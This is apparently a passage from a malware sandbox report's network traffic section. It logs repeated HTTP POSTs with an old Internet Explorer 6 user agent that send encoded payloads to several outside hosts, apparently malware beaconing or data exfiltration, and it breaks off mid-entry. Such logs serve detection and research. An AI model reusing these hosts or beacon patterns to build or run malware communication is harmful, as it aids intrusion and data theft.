gAhoBLrSZ2ifWeUZXcLUe/0fRVIqiX/hjiDXoLP8iDJyZOvVAEPn4EHdwVvWznxN7rhl4QJqJ6Zdn9rCsKL9RjxB//jE8mSZ5PBFIenVeqbIUM5OXKv373z3Eb99KHrEF9lbGOSTvV0eaAvac2SutcA7rTj2xqTP7aBOFGEtCVLVG3121Wk+2AGeMG2xhxbyWKIVqKnMUa9B0UZuw8KPdu9QWdREipEN31URXrT5V/LDQh+++rh/n7w4ZaHU19A0sovAe+SxoJ8AkVPCDOyefZDpq5Zs7QDsl9cGfIB/YmEribCbhJOGyReEFSdzuNvKLOcSQvJX+CzokGhfCQjXtCTheeJiOrofOof59H+0eccTD4qjY5Wqu4hPw8wz9kyI8The5/PGW0dqvcNy0XQgLZVD5g8XbitIjdlMKsY+mt+RCnk7zSDQn6WCaSLe5sNf3WJj578ontPTIYojgODh61LVBWsQLmMqv4U4GovRrJbMVI/Cxh90XL5iks7JEECgqdhaEoTsc5WbI2/5lkLyRnSJDQvDdvUssg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 6b 64 51 61 77 75 55 4f 32 6d 6a 70 34 69 5a 57 6a 50 50 4e 35 56 35 49 74 72 45 7a 2f 4a 6b 6e 36 63 45 70 36 63 44 6b 30 67 32 6e 33 56 34 78 64 47 39 6c 48 49 31 6e 51 7a 58 4e 39 4b 74 49 72 39 44 7a 7a 49 62 51 48 78 78 59 68 4e 6f 50 34 72 47 4f 70 37 56 63 46 66 57 46 62 55 48 73 53 4f 76 5a 33 75 73 4d 4e 4b 79 4f 37 7a 73 63 75 63 65 78 74 6a 38 33 42 55 68 52 4a 45 4c 41 47 49 6c 4b 4d 32 4c 65 50 35 54 78 44 4d 65 48 52 55 2f 65 4e 65 44 67 4b 57 6c 38 45 30 49 61 6b 44 4a 76 4d 6e 64 6f 49 38 57 4a 53 77 46 6d 31 66 74 52 53 44 6c 76 73 68 47 65 30 41 6d 4a 66 67 65 77 6d 6f 50 30 38 46 6f 34 33 4d 64 44 37 69 6f 52 63 77 4b 53 6d 76 31 35 38 58 43 33 64 42 66 37 69 57 4e 34 31 2b 75 4c 38 6e 74 37 6b 32 36 59 61 47 6f 61 45 65 78 47 79 4a 76 59 50 2f 49 5a 50 57 69 41 7a 48 62 46 2b 4c 39 41 58 6c 54 6f 41 6d 44 78 68 59 42 73 6b 38 71 73 46 61 69 48 6a 54 75 75 38 7a 30 37 76 65 55 6c 53 2b 46 6c 49 41 33 49 61 31 72 56 4a 39 74 4b 2f 42 63 47 42 35 56 4f 33 78 61 64 4a 51 4e 57 53 74 55 4d 79 4f 74 55 39 4a 6f 41 49 4e 65 66 77 79 37 42 42 6b 77 61 35 32 2b 64 73 44 30 6f 70 65 50 44 44 50 32 71 71 6f 2b 57 51 38 44 53 65 4e 4b 5a 37 2f 4c 44 42 76 35 4d 4c 62 53 63 44 56 52 41 48 65 6b 6b 45 4e 4d 70 7a 56 58 48 54 79 6c 6b 54 78 61 65 43 55 5a 76 56 69 49 4f 79 5a 49 39 6e 7a 65 57 77 4d 56 6f 57 55 42 35 46 39 59 43 73 74 42 50 6e 43 57 53 75 42 7a 47 49 59 72 79 69 46 43 6a 6a 4c 63 30 5a 45 47 65 77 2f 4b 5a 68 68 77 37 54 66 66 71 66 36 49 43 73 31 46 41 76 53 6f 61 52 6b 41 48 4b 6c 46 50 78 66 37 46 6c 6e 32 4c 54 78 49 6f 69 71 49 36 38 77 3d 3d Data Ascii: kdQawuUO2mjp4iZWjPPN5V5ItrEz/Jkn6cEp6cDk0g2n3V4xdG9lHI1nQzXN9KtIr9DzzIbQHxxYhNoP4rGOp7VcFfWFbUHsSOvZ3usMNKyO7zscucextj83BUhRJELAGIlKM2LeP5TxDMeHRU/eNeDgKWl8E0IakDJvMndoI8WJSwFm1ftRSDlvshGe0AmJfgewmoP08Fo43MdD7ioRcwKSmv158XC3dBf7iWN41+uL8nt7k26YaGoaEexGyJvYP/IZPWiAzHbF+L9AXlToAmDxhYBsk8qsFaiHjTuu8z07veUlS+FlIA3Ia1rVJ9tK/BcGB5VO3xadJQNWStUMyOtU9JoAINefwy7BBkwa52+dsD0opePDDP2qqo+WQ8DSeNKZ7/LDBv5MLbScDVRAHekkENMpzVXHTylkTxaeCUZvViIOyZI9nzeWwMVoWUB5F9YCstBPnCWSuBzGIYryiFCjjLc0ZEGew/KZhhw7Tffqf6ICs1FAvSoaRkAHKlFPxf7Fln2LTxIoiqI68w==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.wifi4all.nlCache-Control: no-cacheData Raw: 4c 73 64 5a 37 46 79 2b 34 32 68 63 73 47 71 43 68 30 62 55 35 4f 2f 68 4d 55 5a 30 4d 67 62 77 55 49 30 35 79 67 35 46 32 36 71 4b 54 71 76 34 4c 48 68 6b 72 31 4e 76 78 6d 68 65 53 79 55 6d 73 4a 4b 6e 67 49 69 50 44 69 32 6b 47 65 66 35 79 78 57 4d 42 77 2f 4f 46 6e 66 6b 57 6c 5a 74 66 6b 6e 2b 66 71 52 68 58 70 45 37 73 2f 5a 6b 7a 68 4c 51 77 75 38 6d 4b 64 65 33 35 31 6a 66 64 45 63 47 67 69 77 42 43 7a 52 36 76 51 73 32 70 53 38 32 59 69 67 4a 48 4d 68 4a 4e 53 68 32 36 4f 32 67 75 6f 62 42 41 57 4e 6a 70 4e 77 64 50 74 58 62 30 7a 66 47 4e 75 48 4f 4d 36 49 31 32 70 78 5a 64 36 74 43 6b 54 2b 38 31 47 4a 33 73 44 35 31 72 79 35 2f 75 78 66 49 4b 57 74 4c 38 6c 42 67 33 6c 32 6e 2f 54 6e 49 70 69 6e 71 77 70 6c 78 58 6c 49 74 68 62 43 43 74 4f 4f 41 52 62 61 54 65 45 33 30 66 7a 71 31 2b 39 4e 39 58 72 42 67 44 79 6e 34 76 2b 34 43 62 6f 65 33 31 39 67 79 2f 6b 75 62 77 69 38 78 6b 6a 57 39 46 46 49 48 54 7a 69 34 65 75 33 70 4f 6d 6e 4b 54 76 64 2b 7a 4f 77 72 4c 46 78 42 76 69 54 50 6e 6f 57 46 46 67 46 4e 2f 51 6c 66 4d 4e 6d 4d 4d 46 68 6e 35 70 4c 4d 44 4d 52 73 36 68 59 75 6e 45 42 2b 71 65 2f 47 47 49 2f 44 69 4f 62 34 55 45 66 58 4d 6f 36 76 6f 44 55 77 41 34 41 66 39 6c 46 4b 72 43 4f 51 37 6a 7a 2b 54 2f 54 43 44 63 67 63 31 4c 56 59 67 53 66 38 45 61 39 72 58 35 45 72 4a 74 54 63 68 55 49 7a 4a 61 76 58 74 58 63 52 35 41 77 5a 36 57 43 42 4b 31 73 51 30 47 4c 53 5a 37 53 4b 62 4b 71 6c 54 4c 58 74 41 56 4e 56 7a 62 45 58 35 41 66 4d 31 68 6a 66 54 65 30 2f 56 64 30 58 32 75 45 64 71 2f 64 51 4a 75 79 6a 30 30 59 6a 44 6c 5a 5a 6c 6e 34 37 4e 37 2b 70 50 4d 76 42 6e 44 46 31 57 49 4d 3d Data Ascii: LsdZ7Fy+42hcsGqCh0bU5O/hMUZ0MgbwUI05yg5F26qKTqv4LHhkr1NvxmheSyUmsJKngIiPDi2kGef5yxWMBw/OFnfkWlZtfkn+fqRhXpE7s/ZkzhLQwu8mKde351jfdEcGgiwBCzR6vQs2pS82YigJHMhJNSh26O2guobBAWNjpNwdPtXb0zfGNuHOM6I12pxZd6tCkT+81GJ3sD51ry5/uxfIKWtL8lBg3l2n/TnIpinqwplxXlIthbCCtOOARbaTeE30fzq1+9N9XrBgDyn4v+4Cboe319gy/kubwi8xkjW9FFIHTzi4eu3pOmnKTvd+zOwrLFxBviTPnoWFFgFN/QlfMNmMMFhn5pLMDMRs6hYunEB+qe/GGI/DiOb4UEfXMo6voDUwA4Af9lFKrCOQ7jz+T/TCDcgc1LVYgSf8Ea9rX5ErJtTchUIzJavXtXcR5AwZ6WCBK1sQ0GLSZ7SKbKqlTLXtAVNVzbEX5AfM1hjfTe0/Vd0X2uEdq/dQJuyj00YjDlZZln47N7+pPMvBnDF1WIM=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 34 69 34 4a 6e 54 4e 37 36 57 69 6a 72 38 4a 5a 65 6f 5a 62 6e 39 7a 54 34 50 6d 5a 77 51 7a 2f 46 34 52 2b 79 78 7a 75 4a 4d 63 31 7a 33 70 4a 6b 37 32 36 48 72 50 6f 47 78 47 4f 45 66 47 32 37 2b 39 41 42 76 6e 76 33 50 66 33 38 71 46 34 74 51 75 4f 64 2f 6a 71 63 47 39 6a 75 49 57 61 38 4c 72 62 34 6b 33 4d 5a 48 35 61 39 72 39 73 50 68 57 4e 49 6d 30 43 6e 70 5a 39 42 68 69 46 32 45 45 2f 79 6d 4d 54 2f 44 61 57 33 6b 55 69 48 52 54 72 57 32 4b 53 53 62 43 69 52 77 44 47 48 52 4f 38 65 69 4a 6a 53 2f 30 4e 67 38 42 74 66 35 41 39 34 7a 55 42 48 71 46 4e 44 43 72 48 7a 45 77 4f 4c 47 53 52 6d 53 53 34 75 76 69 66 4b 56 57 4d 52 31 32 53 39 67 7a 4d 34 51 56 56 78 37 46 71 49 57 4e 4a 73 4c 35 32 6e 62 45 69 55 6f 41 75 38 43 57 65 35 73 50 49 79 33 73 38 33 32 66 56 2b 43 72 47 45 72 55 35 76 79 54 38 63 38 78 4d 68 59 2b 34 49 6e 59 77 49 4e 39 61 6b 39 2f 47 47 34 6f 6b 35 75 54 4a 6b 42 77 50 33 76 2f 4f 6c 53 56 2b 31 38 6d 56 35 2f 6e 71 6d 51 6c 63 6d 52 73 58 34 6e 7a 68 56 2f 6b 62 31 53 6d 49 70 41 70 4e 66 36 47 6a 63 4f 64 6a 46 64 4a 74 69 45 6f 2b 34 6c 77 30 32 6c 68 64 4e 48 57 4a 34 65 46 54 51 51 7a 65 38 57 32 35 36 58 76 52 79 31 30 56 68 42 50 69 43 7a 61 34 43 4a 72 66 54 6b 31 7a 52 73 4b 55 69 50 4f 4d 4a 51 4f 5a 4b 48 6d 48 64 4c 39 51 58 32 6d 5a 4b 58 44 4e 4f 51 31 4b 47 53 31 6c 55 39 6f 2b 6f 4a 6e 43 47 30 56 50 42 48 4c 76 43 35 74 55 79 4c 76 2b 5a 79 61 32 41 78 54 71 49 70 4d 65 32 36 4a 48 78 65 6d 76 6e 56 54 59 38 47 46 52 61 6f 59 58 48 68 37 2b 42 77 34 44 72 68 76 48 63 38 6d 50 48 64 53 73 35 33 74 71 53 52 6e 35 43 56 33 6b 63 63 69 73 Data Ascii: 4i4JnTN76Wijr8JZeoZbn9zT4PmZwQz/F4R+yxzuJMc1z3pJk726HrPoGxGOEfG27+9ABvnv3Pf38qF4tQuOd/jqcG9juIWa8Lrb4k3MZH5a9r9sPhWNIm0CnpZ9BhiF2EE/ymMT/DaW3kUiHRTrW2KSSbCiRwDGHRO8eiJjS/0Ng8Btf5A94zUBHqFNDCrHzEwOLGSRmSS4uvifKVWMR12S9gzM4QVVx7FqIWNJsL52nbEiUoAu8CWe5sPIy3s832fV+CrGErU5vyT8c8xMhY+4InYwIN9ak9/GG4ok5uTJkBwP3v/OlSV+18mV5/nqmQlcmRsX4nzhV/kb1SmIpApNf6GjcOdjFdJtiEo+4lw02lhdNHWJ4eFTQQze8W256XvRy10VhBPiCza4CJrfTk1zRsKUiPOMJQOZKHmHdL9QX2mZKXDNOQ1KGS1lU9o+oJnCG0VPBHLvC5tUyLv+Zya2AxTqIpMe26JHxemvnVTY8GFRaoYXHh7+Bw4DrhvHc8mPHdSs53tqSRn5CV3kccis
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 44 48 51 6f 54 6e 50 72 35 6d 69 48 47 42 71 62 75 72 6f 7a 6b 42 7a 75 68 6c 72 5a 46 6a 47 6d 56 39 43 55 79 4b 78 44 69 53 48 37 41 58 39 43 68 35 2f 4a 68 37 79 62 45 52 76 42 77 72 53 6a 49 4d 4d 32 64 4f 47 6d 77 6d 41 63 7a 54 73 34 38 44 30 4f 43 76 6b 66 36 58 76 76 2b 35 55 42 34 62 7a 5a 67 63 79 59 78 61 47 50 47 4d 66 47 37 6c 45 4e 49 2f 44 78 55 65 6a 49 6d 65 6d 58 68 58 71 51 55 36 77 4e 6d 33 38 76 30 5a 51 4b 55 39 62 6c 63 55 4a 44 46 73 5a 42 77 47 6b 67 2b 51 54 56 47 5a 4a 43 53 32 57 68 64 35 79 33 30 38 43 41 4b 54 54 30 37 76 58 61 73 32 68 58 6f 75 58 32 49 51 64 6b 72 6e 69 4e 4d 6a 61 59 31 48 59 2f 41 48 72 41 31 56 2b 46 39 52 4a 78 4b 39 44 64 73 79 5a 57 6c 42 61 4e 61 47 73 73 61 34 69 49 57 4a 54 68 76 7a 31 65 36 6f 65 66 71 6c 6b 69 42 53 62 30 50 55 50 70 76 57 51 4f 6b 62 4a 4b 77 37 34 4e 47 51 45 55 6a 67 36 76 48 4e 6a 65 59 4b 35 63 4a 67 63 79 73 52 7a 67 77 58 34 6b 6e 68 34 58 73 67 37 4b 48 73 58 52 64 42 47 58 73 4e 69 48 75 45 35 37 4c 34 57 30 59 6c 5a 73 6d 31 39 41 42 62 45 73 6a 6e 6e 65 4b 30 44 36 6f 68 34 69 7a 51 33 51 72 66 42 32 48 6e 62 53 75 4a 69 7a 42 38 71 55 48 77 72 70 32 64 67 54 4b 62 71 5a 61 6f 35 55 4f 50 74 4c 61 70 36 4d 48 75 38 65 2f 78 44 43 75 50 34 36 43 30 6a 46 52 2b 31 59 31 63 78 32 51 71 74 6b 7a 70 6f 45 74 4d 45 42 52 68 57 51 42 45 45 65 4f 76 37 71 55 57 6d 6e 57 4d 7a 36 39 2b 33 76 6d 2f 65 6d 69 53 74 49 54 46 76 4b 36 6a 78 72 53 56 69 6b 4a 51 48 37 65 42 55 61 48 2f 4b 7a 45 54 31 46 30 44 74 32 70 33 4f 6c 72 76 34 59 71 6f 41 36 61 4a 4f 70 72 44 39 34 7a 48 2b 78 42 43 71 4b 2b 76 47 31 79 4e 54 64 44 79 50 43 42 36 30 3d Data Ascii: DHQoTnPr5miHGBqburozkBzuhlrZFjGmV9CUyKxDiSH7AX9Ch5/Jh7ybERvBwrSjIMM2dOGmwmAczTs48D0OCvkf6Xvv+5UB4bzZgcyYxaGPGMfG7lENI/DxUejImemXhXqQU6wNm38v0ZQKU9blcUJDFsZBwGkg+QTVGZJCS2Whd5y308CAKTT07vXas2hXouX2IQdkrniNMjaY1HY/AHrA1V+F9RJxK9DdsyZWlBaNaGssa4iIWJThvz1e6oefqlkiBSb0PUPpvWQOkbJKw74NGQEUjg6vHNjeYK5cJgcysRzgwX4knh4Xsg7KHsXRdBGXsNiHuE57L4W0YlZsm19ABbEsjnneK0D6oh4izQ3QrfB2HnbSuJizB8qUHwrp2dgTKbqZao5UOPtLap6MHu8e/xDCuP46C0jFR+1Y1cx2QqtkzpoEtMEBRhWQBEEeOv7qUWmnWMz69+3vm/emiStITFvK6jxrSVikJQH7eBUaH/KzET1F0Dt2p3Olrv4YqoA6aJOprD94zH+xBCqK+vG1yNTdDyPCB60=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.elpro.siCache-Control: no-cacheData Raw: 47 32 76 41 66 37 2b 48 36 47 67 62 59 33 4b 4e 6e 76 4c 36 64 30 68 6f 59 76 51 56 42 2b 67 38 59 79 74 79 79 58 47 4e 32 30 56 74 4e 6b 36 36 71 61 33 63 44 59 7a 4a 6a 4e 35 47 75 6f 38 4c 56 54 6b 55 36 47 70 46 49 2b 2f 57 6e 42 74 6f 51 37 31 52 71 57 36 59 76 2b 65 35 62 6f 44 67 6c 6e 6f 7a 2f 44 32 69 35 79 76 69 38 4f 38 65 74 57 48 4a 67 6f 46 56 4f 51 31 31 41 37 4a 53 68 6d 37 6a 64 73 38 4e 52 79 46 76 31 78 56 56 64 48 7a 62 66 31 51 4c 4c 64 59 61 53 37 63 61 4e 34 46 58 4e 67 43 75 73 4a 79 72 68 73 6b 42 6a 6f 43 61 5a 78 48 2b 59 75 46 45 4a 34 63 65 30 67 59 58 66 4c 37 51 42 6f 5a 67 58 56 63 57 37 4c 74 57 72 47 30 46 55 71 70 53 67 33 68 5a 46 32 6a 41 62 30 69 42 71 53 76 64 6f 43 4b 36 53 6d 53 71 59 63 47 4e 51 4a 66 5a 73 4f 65 66 33 66 77 63 6d 66 5a 4b 56 54 43 75 55 33 6b 48 71 74 30 6d 55 32 61 63 79 6a 56 2f 4b 74 72 4b 79 2b 6e 68 4a 6b 72 75 6c 45 68 53 55 45 59 2b 46 59 58 69 4d 55 77 72 41 70 58 5a 45 4d 43 69 61 6f 69 4a 62 49 56 4e 6b 58 42 38 43 2b 64 30 35 33 46 68 43 2b 45 52 7a 53 63 4a 50 57 32 49 31 4b 53 7a 48 33 52 4b 79 6d 6e 35 7a 47 33 43 76 71 68 67 4d 6a 71 75 79 79 47 45 31 72 6f 73 43 73 7a 59 45 39 6c 43 74 66 45 78 69 2b 47 48 63 63 72 4d 33 43 53 4b 46 57 76 50 74 59 39 45 42 38 36 66 71 48 67 58 71 46 72 6d 50 30 68 73 57 55 76 31 34 62 2b 4f 41 39 43 4f 6e 65 2b 72 44 6f 32 43 4d 63 74 4f 75 39 47 49 67 4f 46 42 53 53 59 76 58 44 54 55 6b 6a 56 69 2b 44 6a 61 35 46 6c 70 55 79 54 4f 33 54 4e 59 36 61 4f 45 5a 62 4f 73 4c 73 37 64 61 56 30 6e 61 65 73 67 53 30 55 76 7a 57 73 78 4d 49 4b 45 74 37 68 51 52 44 6c 35 32 76 56 70 31 52 70 54 55 33 71 79 6e 48 44 5a 69 72 5a 6b 2b 42 4c 73 65 33 62 37 5a 77 57 2f 53 39 68 74 44 6b 52 4e 31 75 69 54 71 77 4d 3d Data Ascii: G2vAf7+H6GgbY3KNnvL6d0hoYvQVB+g8YytyyXGN20VtNk66qa3cDYzJjN5Guo8LVTkU6GpFI+/WnBtoQ71RqW6Yv+e5boDglnoz/D2i5yvi8O8etWHJgoFVOQ11A7JShm7jds8NRyFv1xVVdHzbf1QLLdYaS7caN4FXNgCusJyrhskBjoCaZxH+YuFEJ4ce0gYXfL7QBoZgXVcW7LtWrG0FUqpSg3hZF2jAb0iBqSvdoCK6SmSqYcGNQJfZsOef3fwcmfZKVTCuU3kHqt0mU2acyjV/KtrKy+nhJkrulEhSUEY+FYXiMUwrApXZEMCiaoiJbIVNkXB8C+d053FhC+ERzScJPW2I1KSzH3RKymn5zG3CvqhgMjquyyGE1rosCszYE9lCtfExi+GHccrM3CSKFWvPtY9EB86fqHgXqFrmP0hsWUv14b+OA9COne+rDo2CMctOu9GIgOFBSSYvXDTUkjVi+Dja5FlpUyTO3TNY6aOEZbOsLs7daV0naesgS0UvzWsxMIKEt7hQRDl52vVp1RpTU3qynHDZirZk+BLse3b7ZwW/S9htDkRN1uiTqwM=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 54 46 31 77 4f 54 4d 2f 35 6d 67 72 53 41 57 39 65 6e 70 4a 65 64 77 33 4c 71 36 5a 31 64 4c 41 46 34 43 46 67 73 6f 56 49 64 65 32 70 35 74 38 5a 6c 6e 7a 67 68 46 46 36 6f 79 71 32 35 43 39 2b 6e 37 77 74 74 2b 52 47 35 77 7a 7a 36 39 4e 2b 6a 48 67 68 46 76 44 69 52 61 30 54 4d 6f 70 35 4e 64 76 4f 7a 36 76 78 76 43 42 5a 78 44 6d 65 68 50 70 67 5a 6a 6c 63 6f 41 54 6a 30 79 66 61 2f 52 32 65 33 56 61 4a 5a 4d 37 74 67 5a 57 6c 4f 73 63 76 59 34 6b 2b 4a 4a 6a 61 4e 61 73 33 35 48 56 45 43 34 32 62 74 66 68 71 52 78 6b 6c 4a 55 2f 52 6d 69 43 4a 35 32 6a 48 50 70 2b 78 4a 66 53 36 4e 6c 34 50 79 39 2f 4f 33 49 6c 4b 54 70 73 32 32 75 30 56 5a 64 66 6e 70 38 66 52 31 43 46 77 33 4d 35 52 63 2b 73 54 67 74 4e 35 43 44 52 69 49 51 54 48 59 59 62 4d 4a 36 39 56 68 5a 52 57 36 67 46 68 49 63 6a 35 6b 64 46 4a 72 4d 59 32 4d 6b 2f 57 72 65 2f 43 62 72 32 73 37 2f 43 70 74 70 45 39 57 5a 36 59 47 6a 41 37 50 4d 4c 43 63 72 47 31 6a 44 32 44 74 34 79 45 31 51 31 2f 5a 61 79 5a 38 61 4f 63 72 53 36 57 55 38 4a 64 53 34 72 59 72 52 76 75 34 31 72 42 45 50 66 61 44 46 41 46 58 4f 56 74 6a 55 6e 76 4c 67 48 59 62 59 59 4d 4c 4b 71 58 4d 38 65 59 67 33 77 53 69 56 39 74 46 6c 4b 50 35 34 37 30 63 56 6f 71 65 4b 49 6f 6b 75 67 38 4b 55 61 72 73 55 4a 36 53 53 4a 77 48 52 48 32 4d 49 4c 70 46 2b 62 73 4c 6b 70 4c 5a 37 57 6a 46 78 52 37 35 37 35 42 4a 66 35 61 48 7a 41 32 4d 4a 32 44 4f 50 48 2b 55 35 4e 31 47 38 39 61 7a 43 69 77 42 30 77 4c 7a 67 49 74 53 2f 4a 46 44 68 45 58 7a 63 56 76 38 65 54 61 76 6b 72 68 6e 37 47 59 4d 6d 71 78 69 66 46 45 33 55 59 34 66 6c 46 56 2f 52 48 77 52 41 65 Data Ascii: TF1wOTM/5mgrSAW9enpJedw3Lq6Z1dLAF4CFgsoVIde2p5t8ZlnzghFF6oyq25C9+n7wtt+RG5wzz69N+jHghFvDiRa0TMop5NdvOz6vxvCBZxDmehPpgZjlcoATj0yfa/R2e3VaJZM7tgZWlOscvY4k+JJjaNas35HVEC42btfhqRxklJU/RmiCJ52jHPp+xJfS6Nl4Py9/O3IlKTps22u0VZdfnp8fR1CFw3M5Rc+sTgtN5CDRiIQTHYYbMJ69VhZRW6gFhIcj5kdFJrMY2Mk/Wre/Cbr2s7/CptpE9WZ6YGjA7PMLCcrG1jD2Dt4yE1Q1/ZayZ8aOcrS6WU8JdS4rYrRvu41rBEPfaDFAFXOVtjUnvLgHYbYYMLKqXM8eYg3wSiV9tFlKP5470cVoqeKIokug8KUarsUJ6SSJwHRH2MILpF+bsLkpLZ7WjFxR7575BJf5aHzA2MJ2DOPH+U5N1G89azCiwB0wLzgItS/JFDhEXzcVv8eTavkrhn7GYMmqxifFE3UY4flFV/RHwRAe
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 44 48 51 6f 54 6e 50 72 35 6d 69 48 47 42 71 62 75 72 6f 7a 6b 42 7a 75 68 6c 72 5a 46 6a 47 6d 56 39 43 55 79 4b 78 44 69 53 48 37 41 58 39 43 68 35 2f 4a 68 37 79 62 45 52 76 42 77 72 53 6a 49 4d 4d 32 64 4f 47 6d 77 6d 41 63 7a 54 73 34 38 44 30 4f 43 76 6b 66 36 58 76 76 2b 35 55 42 34 62 7a 5a 67 63 79 59 78 61 47 50 47 4d 66 47 37 6c 45 4e 49 2f 44 78 55 65 6a 49 6d 65 6d 58 68 58 71 51 55 36 77 4e 6d 33 38 76 30 5a 51 4b 55 39 62 6c 63 55 4a 44 46 73 5a 42 77 47 6b 67 2b 51 54 56 47 5a 4a 43 53 32 57 68 64 35 79 33 30 38 43 41 4b 54 54 30 37 76 58 61 73 32 68 58 6f 75 58 32 49 51 64 6b 72 6e 69 4e 4d 6a 61 59 31 48 59 2f 41 48 72 41 31 56 2b 46 39 52 4a 78 4b 39 44 64 73 79 5a 57 6c 42 61 4e 61 47 73 73 61 34 69 49 57 4a 54 68 76 7a 31 65 36 6f 65 66 71 6c 6b 69 42 53 62 30 50 55 50 70 76 57 51 4f 6b 62 4a 4b 77 37 34 4e 47 51 45 55 6a 67 36 76 48 4e 6a 65 59 4b 35 63 4a 67 63 79 73 52 7a 67 77 58 34 6b 6e 68 34 58 73 67 37 4b 48 73 58 52 64 42 47 58 73 4e 69 48 75 45 35 37 4c 34 57 30 59 6c 5a 73 6d 31 39 41 42 62 45 73 6a 6e 6e 65 4b 30 44 36 6f 68 34 69 7a 51 33 51 72 66 42 32 48 6e 62 53 75 4a 69 7a 42 38 71 55 48 77 72 70 32 64 67 54 4b 62 71 5a 61 6f 35 55 4f 50 74 4c 61 70 36 4d 48 75 38 65 2f 78 44 43 75 50 34 36 43 30 6a 46 52 2b 31 59 31 63 78 32 51 71 74 6b 7a 70 6f 45 74 4d 45 42 52 68 57 51 42 45 45 65 4f 76 37 71 55 57 6d 6e 57 4d 7a 36 39 2b 33 76 6d 2f 65 6d 69 53 74 49 54 46 76 4b 36 6a 78 72 53 56 69 6b 4a 51 48 37 65 42 55 61 48 2f 4b 7a 45 54 31 46 30 44 74 32 70 33 4f 6c 72 76 34 59 71 6f 41 36 61 4a 4f 70 72 44 39 34 7a 48 2b 78 42 43 71 4b 2b 76 47 31 79 4e 54 64 44 79 50 43 42 36 30 3d Data Ascii: DHQoTnPr5miHGBqburozkBzuhlrZFjGmV9CUyKxDiSH7AX9Ch5/Jh7ybERvBwrSjIMM2dOGmwmAczTs48D0OCvkf6Xvv+5UB4bzZgcyYxaGPGMfG7lENI/DxUejImemXhXqQU6wNm38v0ZQKU9blcUJDFsZBwGkg+QTVGZJCS2Whd5y308CAKTT07vXas2hXouX2IQdkrniNMjaY1HY/AHrA1V+F9RJxK9DdsyZWlBaNaGssa4iIWJThvz1e6oefqlkiBSb0PUPpvWQOkbJKw74NGQEUjg6vHNjeYK5cJgcysRzgwX4knh4Xsg7KHsXRdBGXsNiHuE57L4W0YlZsm19ABbEsjnneK0D6oh4izQ3QrfB2HnbSuJizB8qUHwrp2dgTKbqZao5UOPtLap6MHu8e/xDCuP46C0jFR+1Y1cx2QqtkzpoEtMEBRhWQBEEeOv7qUWmnWMz69+3vm/emiStITFvK6jxrSVikJQH7eBUaH/KzET1F0Dt2p3Olrv4YqoA6aJOprD94zH+xBCqK+vG1yNTdDyPCB60=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheData Raw: 6f 6a 78 62 73 72 77 37 30 57 68 77 30 4c 46 4a 5a 2b 4d 33 77 6b 38 71 43 4b 42 55 65 34 61 4d 73 47 67 2b 72 75 48 35 62 59 79 36 42 53 79 54 2b 79 55 76 4c 78 53 59 6f 53 59 54 34 5a 43 49 2b 6d 46 4e 7a 32 77 6c 6f 46 42 51 37 4b 37 44 75 39 79 64 4e 72 70 73 2f 65 4f 50 79 72 4c 6b 4a 2f 2f 30 4f 46 41 67 35 69 39 69 6d 52 49 52 75 4c 65 6e 41 76 42 4e 73 52 49 68 7a 6a 6a 49 2f 4e 62 78 65 4e 67 6e 72 52 74 4a 6b 45 58 2f 47 65 34 48 4f 36 61 49 53 2b 30 6f 37 48 70 73 34 49 6f 6e 34 66 57 34 4e 72 6b 49 74 6f 6b 2f 54 4f 36 4d 74 53 63 4b 49 48 56 67 34 72 56 4a 56 38 46 35 2b 4a 53 69 64 51 42 51 65 75 74 47 46 4e 79 55 66 2b 78 79 54 5a 37 39 43 73 77 47 6f 7a 43 57 35 79 67 45 30 37 39 39 43 63 54 39 35 48 61 38 48 31 6d 78 61 6a 68 6a 47 43 44 34 36 4f 6c 36 55 49 55 2b 6f 44 47 73 62 64 51 36 2b 43 36 61 70 32 6a 54 59 47 67 44 2b 4c 73 62 31 5a 76 6e 64 78 54 30 44 66 31 59 43 67 56 4f 42 47 5a 41 30 35 53 55 76 2f 42 4b 64 48 66 62 2b 62 68 6f 63 54 30 30 69 30 4a 62 74 63 79 43 39 33 76 45 63 6e 61 41 49 67 36 4f 53 4b 46 74 77 70 42 4c 53 6d 68 6e 69 73 56 72 36 71 36 76 6d 70 78 2f 67 59 66 59 64 31 53 37 6f 6c 52 78 73 71 6b 53 69 4f 47 5a 63 6a 39 76 57 52 72 65 4d 6c 68 56 68 33 5a 37 56 74 39 42 30 76 66 57 5a 33 6a 56 39 57 6c 68 62 73 53 48 35 6b 6d 6d 71 48 71 6f 36 6a 31 66 68 31 72 57 71 4d 69 67 63 77 31 76 41 37 39 7a 33 30 7a 4b 55 6c 57 4d 78 58 71 4c 6b 30 35 2b 52 77 43 34 6b 6b 